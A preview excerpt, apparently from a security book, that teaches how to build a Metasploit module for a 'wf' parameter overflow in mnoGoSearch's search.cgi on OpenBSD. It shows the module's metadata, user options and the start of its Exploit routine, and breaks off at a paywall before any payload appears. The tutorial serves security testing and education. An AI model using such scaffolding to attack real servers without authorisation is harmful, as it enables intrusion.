The Evolution of a Working Exploit Module
Once
the test bed is set up, write an MSF
module to test the vulnerability. This building-block module will
slowly evolve to a final working exploit. The module should require
that the user supply the appropriate options, which will build an
HTTP request with an
overly large wf parameter, create a socket, and
then send the request:
package Msf::Exploit::mnogosearch_wf;
use strict;
use base "Msf::Exploit";
my $advanced = { };
my $info =
{
'Name' => 'Mnogosearch wf test',
'Version' => '$Revision: 1.2 $',
'Arch' => [ 'x86' ],
'OS' => [ 'bsd' ],
'Priv' => 0,
'UserOpts' => {
'RHOST' => [ 1, 'ADDR', 'The target HTTP server address' ],
'RPORT' => [ 1, 'PORT', 'The target HTTP server port', 80],
'URI' => [ 1, 'DATA', 'The target CGI URI', '/cgi-bin/search.cgi' ],
'SSL' => [ 0, 'BOOL', 'Use SSL', 0 ]
},
'DefaultTarget' => 0,
'Targets' =>
[
# Name
[ 'OpenBSD/3.1' ]
],
};The appropriate metadata information, such as the target operating system, target architecture, some user options, and the target address, has been set. Because this is only a test harness module, there is no need for targeting values.
sub new{
my $class = shift;
my $self;
$self = $class->SUPER::new( { 'Info'=>$info, 'Advanced'=>$advanced, }, @_);
return $self;
}
sub Exploit{
my $self = shift;
my $targetHost = $self->GetVar('RHOST');
my $targetPort = $self->GetVar('RPORT');
my $uri = $self->GetVar('URI');A standard new( )
constructor is added so that MSF can create an instance of our ...
Get Network Security Tools now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.
